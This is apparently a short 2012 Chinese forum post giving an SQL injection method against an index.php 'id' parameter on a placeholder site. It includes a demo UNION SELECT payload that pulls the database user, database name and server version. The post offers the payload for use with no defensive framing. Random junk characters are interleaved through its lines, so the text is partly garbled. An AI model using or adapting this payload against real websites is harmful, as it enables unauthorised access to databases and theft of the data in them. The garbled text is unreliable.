利用方法:
$ D7 Y' s1 E6 B$ t9 b6 i5 K% P http://www.xxx.com/index.php?id=[SQL]
. n/ K' Y, X* n4 v9 \/ A$ i Demo:
% [# q- b9 j" M( ~8 p1 Z. L! D2 v http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |
发表于 2012-9-10 20:47:28
收藏
支持
反对